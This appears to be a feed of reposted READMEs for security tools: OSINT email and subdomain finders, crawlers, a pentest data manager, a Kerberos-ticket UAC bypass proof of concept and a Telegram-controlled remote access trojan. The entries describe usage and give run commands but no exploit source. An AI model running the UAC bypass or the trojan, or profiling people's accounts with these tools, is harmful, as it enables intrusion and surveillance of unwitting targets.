    3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
    398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
    3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
    49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    ...

    How to build

    On Windows

    To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
    Clone this repo into \source\tools that is inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
    To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

    On Linux

    For now the support for Linux is experimental. Yet it is possible to build and use Tiny Tracer on Linux as well. Please refer tiny_runner.sh for more information. Detailed description available here.

    Usage

    ο“– Details about the usage you will find on the project's Wiki.

    WARNINGS

    • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
    • In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utilty sometimes gets flagged as a malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
    • Since the version 3.20 Pin has dropped a support for old versions of Windows. If you need to use the tool on Windows < 8, try to compile it with Pin 3.19.


    Questions? Ideas? Join Discussions!



    Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

    By: Zion3R

    Holehe Online Version

    Summary

    Efficiently finding registered accounts from emails.

    Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


    Installation

    With PyPI

    pip3 install holehe

    With Github

    git clone https://github.com/megadose/holehe.git
    cd holehe/
    python3 setup.py install

    Quick Start

    Holehe can be run from the CLI and rapidly embedded within existing python applications.

    ο“š CLI Example

    holehe test@gmail.com

    ο“ˆ Python Example

    import trio
    import httpx

    from holehe.modules.social_media.snapchat import snapchat


    async def main():
    email = "test@gmail.com"
    out = []
    client = httpx.AsyncClient()

    await snapchat(email, client, out)

    print(out)
    await client.aclose()

    trio.run(main)

    Module Output

    For each module, data is returned in a standard dictionary with the following json-equivalent format :

    {
    "name": "example",
    "rateLimit": false,
    "exists": true,
    "emailrecovery": "ex****e@gmail.com",
    "phoneNumber": "0*******78",
    "others": null
    }
    • rateLitmit : Lets you know if you've been rate-limited.
    • exists : If an account exists for the email on that service.
    • emailrecovery : Sometimes partially obfuscated recovery emails are returned.
    • phoneNumber : Sometimes partially obfuscated recovery phone numbers are returned.
    • others : Any extra info.

    Rate limit? Change your IP.

    Maltego Transform : Holehe Maltego

    Thank you to :

    Donations

    For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

     License

    GNU General Public License v3.0

    Built for educational purposes only.

    Modules

    Name Domain Method Frequent Rate Limit
    aboutme about.me register ✘
    adobe adobe.com password recovery ✘
    amazon amazon.com login ✘
    amocrm amocrm.com register ✘
    anydo any.do login βœ”
    archive archive.org register ✘
    armurerieauxerre armurerie-auxerre.com register ✘
    atlassian atlassian.com register ✘
    axonaut axonaut.com register ✘
    babeshows babeshows.co.uk register ✘
    badeggsonline badeggsonline.com register ✘
    biosmods bios-mods.com register ✘
    biotechnologyforums biotechnologyforums.com register ✘
    bitmoji bitmoji.com login ✘
    blablacar blablacar.com register βœ”
    blackworldforum blackworldforum.com register βœ”
    blip blip.fm register βœ”
    blitzortung forum.blitzortung.org register ✘
    bluegrassrivals bluegrassrivals.com register ✘
    bodybuilding bodybuilding.com register ✘
    buymeacoffee buymeacoffee.com register βœ”
    cambridgemt discussion.cambridge-mt.com register ✘
    caringbridge caringbridge.org register ✘
    chinaphonearena chinaphonearena.com register ✘
    clashfarmer clashfarmer.com register βœ”
    codecademy codecademy.com register βœ”
    codeigniter forum.codeigniter.com register ✘
    codepen codepen.io register ✘
    coroflot coroflot.com register ✘
    cpaelites cpaelites.com register ✘
    cpahero cpahero.com register ✘
    cracked_to cracked.to register βœ”
    crevado crevado.com register βœ”
    deliveroo deliveroo.com register βœ”
    demonforums demonforums.net register βœ”
    devrant devrant.com register ✘
    diigo diigo.com register ✘
    discord discord.com register ✘
    docker docker.com register ✘
    dominosfr dominos.fr register βœ”
    ebay ebay.com login βœ”
    ello ello.co register ✘
    envato envato.com register ✘
    eventbrite eventbrite.com login ✘
    evernote evernote.com login ✘
    fanpop fanpop.com register ✘
    firefox firefox.com register ✘
    flickr flickr.com login ✘
    freelancer freelancer.com register ✘
    freiberg drachenhort.user.stunet.tu-freiberg.de register ✘
    garmin garmin.com register βœ”
    github github.com register ✘
    google google.com register βœ”
    gravatar gravatar.com other ✘
    hubspot hubspot.com login ✘
    imgur imgur.com register βœ”
    insightly insightly.com login ✘
    instagram instagram.com register βœ”
    issuu issuu.com register ✘
    koditv forum.kodi.tv register ✘
    komoot komoot.com register βœ”
    laposte laposte.fr register ✘
    lastfm last.fm register ✘
    lastpass lastpass.com register ✘
    mail_ru mail.ru password recovery ✘
    mybb community.mybb.com register ✘
    myspace myspace.com register ✘
    nattyornot nattyornotforum.nattyornot.com register ✘
    naturabuy naturabuy.fr register ✘
    ndemiccreations forum.ndemiccreations.com register ✘
    nextpvr forums.nextpvr.com register ✘
    nike nike.com register ✘
    nimble nimble.com register ✘
    nocrm nocrm.io register ✘
    nutshell nutshell.com register ✘
    odnoklassniki ok.ru password recovery ✘
    office365 office365.com other βœ”
    onlinesequencer onlinesequencer.net register ✘
    parler parler.com login ✘
    patreon patreon.com login βœ”
    pinterest pinterest.com register ✘
    pipedrive pipedrive.com register ✘
    plurk plurk.com register ✘
    pornhub pornhub.com register ✘
    protonmail protonmail.ch other ✘
    quora quora.com register ✘
    rambler rambler.ru register ✘
    redtube redtube.com register ✘
    replit replit.com register βœ”
    rocketreach rocketreach.co register ✘
    samsung samsung.com register ✘
    seoclerks seoclerks.com register ✘
    sevencups 7cups.com register βœ”
    smule smule.com register βœ”
    snapchat snapchat.com login ✘
    soundcloud soundcloud.com register ✘
    sporcle sporcle.com register ✘
    spotify spotify.com register βœ”
    strava strava.com register ✘
    taringa taringa.net register βœ”
    teamleader teamleader.com register ✘
    teamtreehouse teamtreehouse.com register ✘
    tellonym tellonym.me register ✘
    thecardboard thecardboard.org register ✘
    therianguide forums.therian-guide.com register ✘
    thevapingforum thevapingforum.com register ✘
    tumblr tumblr.com register ✘
    tunefind tunefind.com register βœ”
    twitter twitter.com register ✘
    venmo venmo.com register βœ”
    vivino vivino.com register ✘
    voxmedia voxmedia.com register ✘
    vrbo vrbo.com register ✘
    vsco vsco.co register ✘
    wattpad wattpad.com register βœ”
    wordpress wordpress login ✘
    xing xing.com register ✘
    xnxx xnxx.com register βœ”
    xvideos xvideos.com register ✘
    yahoo yahoo.com login βœ”
    zoho zoho.com login βœ”


    Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

    By: Zion3R


    xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.3.0
    sources:
    - alienvault
    - anubis
    - bevigil
    - chaos
    - commoncrawl
    - crtsh
    - fullhunt
    - github
    - hackertarget
    - intelx
    - shodan
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
    fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
    -u, --sources-to-use string[] comma(,) separeted sources to use
    -e, --sources-to-exclude string[] comma(,) separeted sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Bryobio - NETWORK Pcap File Analysis

    By: Zion3R


    NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


    Tested

    OK Debian
    OK Ubuntu

    Requirements

    $ pip install pyshark
    $ pip install dpkt

    $ Wireshark
    $ Tshark
    $ Mergecap
    $ Ngrep

    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦

    $ https://github.com/emrekybs/Bryobio.git
    $ cd Bryobio
    $ chmod +x bryobio.py

    $ python3 bryobio.py



    Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

    By: Zion3R


    This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.


    The Developers

    Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt

    Overview

    The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.


    After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.


    Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.


    Files panel will display all the files from the current pentest. A team member can upload and download those files.


    Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


    PreReport panel will contain all the screenshots from the current pentest.


    Graph panel will contain all of the Users and Servers and the relationship between them.


    APIs allow users to effortlessly retrieve data by making simple API requests.


    curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
    curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
    curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq

    Installation

    Docker

    Pull from GitHub container registry.

    git clone https://github.com/redeye-framework/Redeye.git
    cd Redeye
    docker-compose up -d

    Start/Stop the container

    sudo docker-compose start/stop

    Save/Load Redeye

    docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
    docker load < Redeye.tar

    GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

    Source

    git clone https://github.com/redeye-framework/Redeye.git
    cd Redeye
    sudo apt install python3.8-venv
    python3 -m venv RedeyeVirtualEnv
    source RedeyeVirtualEnv/bin/activate
    pip3 install -r requirements.txt
    python3 RedDB/db.py
    python3 redeye.py --safe

    General

    Redeye will listen on: http://0.0.0.0:8443
    Default Credentials:

    • username: redeye
    • password: redeye

    Neo4j will listen on: http://0.0.0.0:7474
    Default Credentials:

    • username: neo4j
    • password: redeye

    Special-Thanks

    • Yoav Danino for mental support and beta testing.

    Credits

    If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



    InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


    Infohound architecture

    Installation

    git clone https://github.com/xampla/InfoHound.git
    cd InfoHound/infohound
    mv infohound_config.sample.py infohound_config.py
    cd ..
    docker-compose up -d

    You must add API Keys inside infohound_config.py file

    Default modules

    InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

     Retrievval modules

    Name Description
    Get Whois Info Get relevant information from Whois register.
    Get DNS Records This task queries the DNS.
    Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
    Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
    Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
    Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
    Find Email It looks for emails using queries to Google and Bing.
    Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
    Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
    Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
    Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

    Analysis

    Name Description
    Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
    Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
    Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
    Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
    Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
    Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
    Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
    Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
    Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

    Custom modules

    InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

    Inspired by



    Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

    By: Zion3R


    xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


    Features

    • Recursively crawls webpages for URLs.
    • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
    • Parses URLs from robots.txt.
    • Parses URLs from sitemaps.
    • Renders pages (including Single Page Applications such as Angular and React).
    • Cross-Platform (Windows, Linux & macOS)

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xcrawl3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

    ...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xcrawl3r.git 
    • Build the utility

       cd xcrawl3r/cmd/xcrawl3r && \
      go build .
    • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xcrawl3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Usage

    To display help message for xcrawl3r use the -h flag:

    xcrawl3r -h

    help message:

                                 _ _____      
    __ _____ _ __ __ ___ _| |___ / _ __
    \ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
    > < (__| | | (_| |\ V V /| |___) | |
    /_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

    A CLI utility to recursively crawl webpages.

    USAGE:
    xcrawl3r [OPTIONS]

    INPUT:
    -d, --domain string domain to match URLs
    --include-subdomains bool match subdomains' URLs
    -s, --seeds string seed URLs file (use `-` to get from stdin)
    -u, --url string URL to crawl

    CONFIGURATION:
    --depth int maximum depth to crawl (default 3)
    TIP: set it to `0` for infinite recursion
    --headless bool If true the browser will be displayed while crawling.
    -H, --headers string[] custom header to include in requests
    e.g. -H 'Referer: http://example.com/'
    TIP: use multiple flag to set multiple headers
    --proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
    TIP: use multiple flag to set multiple proxies
    --render bool utilize a headless chrome instance to render pages
    --timeout int time to wait for request in seconds (default: 10)
    --user-agent string User Agent to use (default: web)
    TIP: use `web` for a random web user-agent,
    `mobile` for a random mobile user-agent,
    or you can set your specific user-agent.

    RATE LIMIT:
    -c, --concurrency int number of concurrent fetchers to use (default 10)
    --delay int delay between each request in seconds
    --max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
    -p, --parallelism int number of concurrent URLs to process (default: 10)

    OUTPUT:
    --debug bool enable debug mode (default: false)
    -m, --monochrome bool coloring: no colored output mode
    -o, --output string output file to write found URLs
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.

    Credits



    Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

    By: Zion3R


    xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
    - bevigil
    - commoncrawl
    - github
    - intelx
    - otx
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xurlfind3r use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____      
    __ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
    > <| |_| | | | | _| | | | | (_| |___) | |
    /_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomain's URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback , skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    KRBUACBypass - UAC Bypass By Abusing Kerberos Tickets

    By: Zion3R


    This POC is inspired by James Forshaw (@tiraniddo) shared at BlackHat USA 2022 titled β€œTaking Kerberos To The Next Level ” topic, he shared a Demo of abusing Kerberos tickets to achieve UAC bypass. By adding a KERB-AD-RESTRICTION-ENTRY to the service ticket, but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to easily initiate Kerberos requests and manipulate Kerberos tickets.

    You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.


    Tgtdeleg Trick

    We cannot manually generate a TGT as we do not have and do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) in his Kekeo A trick (tgtdeleg) was added that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.

    Tgtdeleg abuses the Kerberos GSS-API to obtain available TGTs for the current user without obtaining elevated privileges on the host. This method uses the AcquireCredentialsHandle function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext function for HOST/DC.domain.com using the ISC_REQ_DELEGATE flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP-REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to β€œRubeus – Now With More Kekeo”.

    With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:

    1. Use the Tgtdeleg trick to get the user's TGT.
    2. Use the TGT to request the KDC to generate a new service ticket for the local computer. Add a KERB-AD-RESTRICTION-ENTRY, but fill in a fake MachineID.
    3. Submit the service ticket into the cache.

    Krbscm

    Once you have a service ticket, you can use Kerberos authentication to access Service Control Manager (SCM) Named Pipes or TCP via HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC: SCMUACBypass.cpp, through the two APIs HOOK AcquireCredentialsHandle and InitializeSecurityContextW, the name of the authentication package called by SCM (pszPack age ) to Kerberos to enable the SCM to use Kerberos when authenticating locally.

    Let’s see it in action

    Now let's take a look at the running effect, as shown in the figure below. First request a ticket for the HOST service of the current server through the asktgs function, and then create a system service through krbscm to gain the SYSTEM privilege.

    KRBUACBypass.exe asktgs
    KRBUACBypass.exe krbscm




    TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

    By: Zion3R


    Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


    Installation:

    1. git clone https://github.com/machine1337/TelegramRAT.git
    2. Now Follow the instructions in HOW TO USE Section.

    HOW TO USE:

    1. Go to Telegram and search for https://t.me/BotFather
    2. Create Bot and get the API_TOKEN
    3. Now search for https://t.me/chatIDrobot and get the chat_id
    4. Now Go to client.py and go to line 16 and 17 and place API_TOKEN and chat_id there
    5. Now run python client.py For Windows and python3 client.py For Linux
    6. Now Go to the bot which u created and send command in message field

    HELP MENU:

    HELP MENU: Coded By Machine1337
    CMD Commands | Execute cmd commands directly in bot
    cd .. | Change the current directory
    cd foldername | Change to current folder
    download filename | Download File From Target
    screenshot | Capture Screenshot
    info | Get System Info
    location | Get Target Location

    Features:

    1. Execute Shell Commands in bot directly.
    2. download file from client.
    3. Get Client System Information.
    4. Get Client Location Information.
    5. Capture Screenshot
    6. More features will be added

    Author:

    Coded By: Machine1337
    Contact: https://t.me/R0ot1337


    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

